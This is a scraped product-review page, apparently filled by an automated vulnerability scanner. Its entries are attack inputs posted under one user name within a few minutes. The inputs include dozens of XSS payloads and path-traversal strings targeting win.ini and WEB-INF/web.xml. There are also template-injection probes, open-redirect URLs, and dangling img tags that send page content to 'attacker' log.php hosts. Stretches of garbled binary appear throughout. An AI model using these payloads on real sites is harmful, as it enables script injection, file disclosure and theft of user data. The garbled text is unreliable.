/www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
������������������������������������������������windows��win.ini
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<input autofocus onfocus=prompt(994715)>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
938540
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=http://www.vulnweb.com></a>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
http://www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
................windowswin.ini
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=jaVaScRiPT:>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
[url=http://www.vulnweb.com][/url]
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
..\..\..\..\..\..\..\..\windows\win.ini
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img<!-- --> src=x onerror=alert(978535);//><!-- -->
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
//www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1}body{acu:Expre/**/SSion(prompt(979534))}
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<% contenteditable onresize=prompt(994884)>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1_kK4lQ
<ScRiPt >prompt(928461)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ifRAme sRc=912362.com></IfRamE>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
/\www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img sRc='http://attacker-995481/log.php?
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1'"()&%<acx><ScRiPt >prompt(963873)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
WEB-INF/web.xml
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
'"()&%<acx><ScRiPt >prompt(992427)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
/www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
1_986547
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
WEB-INF\web.xml
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
939510
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
http://www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
//www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
acu8037<s1﹥s2ʺs3ʹuca8037
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
acux4608��z1��z2a�bcxuca4608
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
/\www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:16 PM
Was this review helpful? Yes No (0/0)
Mr.
CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0  
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
/www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
{{10000478*10000076}}
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
906278
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt >prompt(989014)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
http://www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<script>prompt(971138)</script>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScR<ScRiPt>IpT>prompt(964796)</sCr<ScRiPt>IpT>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(921380)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994578></ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(904453)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
//www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<video><source onerror="javascript:prompt(924348)">
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<svg  

�onload=prompt(912951);>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1%3Csvg%20onload%3Dprompt(901373)%3E
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
/\www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<isindex type=image src=1 onerror=prompt(938885)>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<div style=width:expression(prompt(924217))>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='965384'>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<body onload=prompt(910137)>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(919289)>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=xyz OnErRor=prompt(983384)>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img/src=">" onerror=alert(988115)>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt%20>prompt(937493)</sCripT>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1\u003CScRiPt\u003Eprompt(903011)\u003C/sCripT\u003E
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1&lt;ScRiPt&gt;prompt(992862)&lt;/sCripT&gt;
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
�<img acu onmouseover=prompt(903464) //�>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<input autofocus onfocus=prompt(911695)>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=http://www.vulnweb.com></a>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=jaVaScRiPT:>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
[url=http://www.vulnweb.com][/url]
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img<!-- --> src=x onerror=alert(960816);//><!-- -->
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1}body{acu:Expre/**/SSion(prompt(972200))}
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<% contenteditable onresize=prompt(957780)>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1_8b70U
<ScRiPt >prompt(919566)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ifRAme sRc=997203.com></IfRamE>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img sRc='http://attacker-987984/log.php?
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1'"()&%<acx><ScRiPt >prompt(918929)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
'"()&%<acx><ScRiPt >prompt(929540)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:17 PM
Was this review helpful? Yes No (0/0)
Mr.
1_999290
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
acu9960<s1﹥s2ʺs3ʹuca9960
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
acux2841��z1��z2a�bcxuca2841
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0  
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
{{9999762*10000312}}
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt >prompt(912421)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<script>prompt(968086)</script>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScR<ScRiPt>IpT>prompt(984419)</sCr<ScRiPt>IpT>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(962724)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955010></ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(927313)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<video><source onerror="javascript:prompt(961113)">
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<svg  

�onload=prompt(970235);>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1%3Csvg%20onload%3Dprompt(910594)%3E
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<isindex type=image src=1 onerror=prompt(950553)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<div style=width:expression(prompt(901289))>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='944570'>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<body onload=prompt(905986)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918776)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=xyz OnErRor=prompt(919787)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img/src=">" onerror=alert(921060)>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt%20>prompt(981570)</sCripT>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1\u003CScRiPt\u003Eprompt(940674)\u003C/sCripT\u003E
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1&lt;ScRiPt&gt;prompt(922958)&lt;/sCripT&gt;
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
�<img acu onmouseover=prompt(929515) //�>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<input autofocus onfocus=prompt(917910)>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=http://www.vulnweb.com></a>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=jaVaScRiPT:>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
[url=http://www.vulnweb.com][/url]
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img<!-- --> src=x onerror=alert(901844);//><!-- -->
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1}body{acu:Expre/**/SSion(prompt(970323))}
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<% contenteditable onresize=prompt(990893)>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1_SQezL
<ScRiPt >prompt(992645)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ifRAme sRc=926204.com></IfRamE>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img sRc='http://attacker-956348/log.php?
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.'"()&%<acx><ScRiPt >prompt(989260)</ScRiPt>
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
'"()&%<acx><ScRiPt >prompt(929125)</ScRiPt>
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr._994100
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
acu7111<s1﹥s2ʺs3ʹuca7111
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
acux1431��z1��z2a�bcxuca1431
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
{{9999833*10000122}}
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.<ScRiPt >prompt(974299)</ScRiPt>
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.<script>prompt(956669)</script>
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.<ScR<ScRiPt>IpT>prompt(984384)</sCr<ScRiPt>IpT>
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)